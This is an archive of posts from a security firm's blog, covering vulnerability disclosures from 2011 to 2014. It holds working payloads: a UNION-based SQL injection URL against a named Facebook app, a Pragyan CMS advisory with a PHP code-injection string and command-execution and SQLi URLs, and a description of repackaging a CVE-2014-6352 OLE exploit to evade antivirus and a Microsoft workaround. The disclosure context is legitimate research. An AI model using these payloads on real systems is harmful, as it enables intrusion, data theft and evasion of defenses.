Wednesday, November 5, 2014

CVE-2014-6352 When defenses fall - eliminating the use of .inf files and bypassing Antiviruses!




Regarding CVE-2014-6352 and CVE-2014-4114 as we know .inf files were used in malware samples found in the wild to execute the executable payloads. One of the workaround from Microsoft was to Block the launching of executables via Setup information files (https://technet.microsoft.com/en-us/library/security/ms14-060.aspx)

But  CVE-2014-6352 requires .inf files to execute the payload is a myth which we are going to bust in this blog.

We took a public sample with embedded executable and .inf. When we unzipped it there were 2 ole objects there

OleObject1.bin - which is embedded executable
OleObject2.bin - which is exbedded .inf file

We created another ole object with putty.exe as executable payload. Renamed it as OleObject2.bin

Replaced it in exploit sample and created .ppsx file. When we executed the POC ppxs BOOM our payload got executed proving that using .inf files in not necessary in this particular exploit.

With this method we bypassed 3 things:

1) One of the workaround from MS to prevent the exploit
2) Antivirus signatures
3) Size limit of the executable

Below is the AV scan report of the POC we created. And its a bad news that none of the major AV detects the exploit.





Posted by at No comments:

Friday, October 31, 2014

ASL HackMe Labs - Yet another vulnerable web application!





ASL HackMe Labs is yet another vulnerabile web application to practice various web based attacks. You can practice many web application attacks with these labs. Can be installed in both XAMPP and WAMPP.
To install extract all contents in web root.
Create a database named "security" and import security.sql file to it.
For RFI to work set allow_url_include=On and allow_url_fopen=On in your php.ini


Attacks You Can Practice With ASL HackMe Labs are

1) SQLi login bypass
2) SQLi Error Based
3) SQLi UNION based
4) Bilnd SQLi
5) SQLi filter bypassing
6) SQLi with INSERT_INTO
7) User Agent based SQLi
8) XSS through SQLi
9) Upload webshell through SQLi
10) XSS
11) User Agent based XXS
12) Full Path Disclosure
13) LFI
14) RFI
15) PHP Wrapper injections
16) Cookie based SQLi
17) Image Upload bypasses
18) Javascript Login Bypass
19) Logs Poisoning
20) Remote Command Execution
21) Header Injections

There are three realistic scenarios also.


Download ASL HackMe Labs Here




Keep checking our blog and youtube channel for ASL HackMe Labs tutorials:
Blog: http://www.aslitsecurity.blogspot.com/
Youtube Channel: https://www.youtube.com/channel/UCvQqfl3gCjepWk5VwMJS5oA
Website: www.aslitsecurity.com
Trainings: www.training.aslitsecurity.com
Posted by at No comments:

Thursday, October 23, 2014

CVE-2014-6352 OLE Remote Code Execution Vulnerability

Here is working exploit POC for CVE-2014-6352 OLE Remote Code Execution Vulnerability. Available through our exploit subscription and binary analysis program.




Posted by at No comments:

Thursday, April 19, 2012

MS Word RTFPfragments exploit for office 2008 OSX

Posted by at 4 comments:

Wednesday, April 18, 2012

AOL search XSS

XSS vulnerability in AOL search. We are trying to contact the AOL team. No reply from them yet.

Posted by at 1 comment:

Sunday, February 12, 2012

Yahoo Cross Site Scripting Vulnerability!

There is a Cross Site Scripting Vulnerability in yahoo.com subdomain. Its in upcoming.yahoo.com . This vulnerability allows the attacker to steal cookies and perform session hijacking attacks or use XSS worms. The vendor has been notified regarding the vulnerability details.

Posted by at No comments:

Tuesday, July 5, 2011

SAP Player 0.9 (.m3u) universal

This exploit uses direct return address. Not SEH version


http://packetstormsecurity.org/files/view/102792/sapplayer-overflow.py.txt
Posted by at No comments:

Monday, March 21, 2011

Another vulnerability in facebook apps!

This is second sql injection we found in facebook apps.

We tried to contact developers but got no response from them. So we decided to release the vulnerability.

Note:: There are few more facebook apps which we found are vulnerable to sql injection attacks. We are waiting for the developers to patch those. We will post them as soon as they are patched.

A Proof Of Concept of the vulnerability can be seen at::

http://apps.facebook.com/lucygames/game.php?gameid=-123%20UNION%20SELECT%20null,%28select%20concat%280x3a,unhex%28Hex%28cast%28group_concat%28table_name%29%20as%20char%29%29%29,0x3a%29%20FROM%20information_schema.tables%20Where%20table_schema=0x6C75637967616D6573%29,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--
Posted by at No comments:

Wednesday, March 9, 2011

Sql Injection in Facebook applications!

We found a vulnerability in 2 facebook applications. One is patched now so we are disclosing the vulnerability.


There was a SQL Injection vulnerability in apps.facebook.com

Vendor::twmarketplace
Location:: http://apps.facebook.com/twmarketplace/post.php?postid=
Severity:: Critical
Impact:: Database access/server control


It was possible to extract all data of all databases located on that servers


Changelog::
7/3/2010 - Facebook vendors notified
8/3/2010 - Response from verdor
8/3/2010 - Vendor patched the vulnerability
9/3/2010 - Public disclosure
Posted by at 3 comments:

Saturday, February 26, 2011

Pragyan CMS v 3,0 mulltiple vulnerabilities!

During the Pragyan's hacking challange we found these vulnerabilities in their open source CMS.


#Pragyan CMS v 3.0 mutiple Vulnerabilities


#Author Villy and Abhishek Lyall - villys777[at]gmail[dot]com,

abhilyall[at]gmail[dot]com

#Web - http://www.aslitsecurity.com/

#Blog - http://bugix-security.blogspot.com

#http://www.aslitsecurity.blogspot.com/

#Pragyan CMS v 3.0



Technical Description





1) Code execution in INSTALL/install.php

script not correctly validate entered fields.

possibility to write at password field string:



");echo exec($_GET["a"]);echo ("



or in another fields with turned of javascript.

in cms/config.inc.php will be code:

define("MYSQL_PASSWORD","");echo exec($_GET["a"]);echo ("");

which allows command execution.



EXPLOIT:: http://target.com/blog/cms/config.inc.php?a=ls -la



2) sql injection

- get mysql version EXPLOIT::

http://target.com/path/+view&thread_id=-1 UNION ALL SELECT

null,null,null,null,concat(unhex(Hex(cast(@@version as

char)))),null,null,null--



Solution

update to Pragyan CMS 3.0 rev.274



Changelog

2011-19-02 : Initial release

2011-20-02 : Reported to vendor

2011-25-02 : patch released

2011-25-02 : public disclose



Credits

Villy

Abhishek Lyall

pragyan.org

http://bugix-security.blogspot.com

http://www.aslitsecurity.blogspot.com/





Abhishek Lyall





Posted by at No comments:
Subscribe to: Posts (Atom)